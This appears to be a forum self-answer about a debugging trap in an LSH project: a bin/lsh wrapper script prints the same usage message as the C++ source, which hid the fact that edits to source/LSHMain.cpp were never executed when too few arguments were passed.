There is a script in bin folder which will take over and print the very same message as usage() would print, that's why I thought that I was reaching that call. The function call lies inside if(nargs < 9), which made me to give in purpose less arguments so that it would sure fall inside that if and won't execute the algorithm (which takes time).
In short:
In order to reach the point that the code source/LSHMain.cpp gets executed one must pass the correct arguments to to bin/lsh. If not, bin/lsh script will only be executed, thus shadowing the modifications made in source/LSHMain.cpp.
Hope that this answer will make future users to avoid such a trap. Special thanks to Etan Reisner that helped me and eventually made me think to delete source/LSHMain.cpp, which made me to figure out what was happening.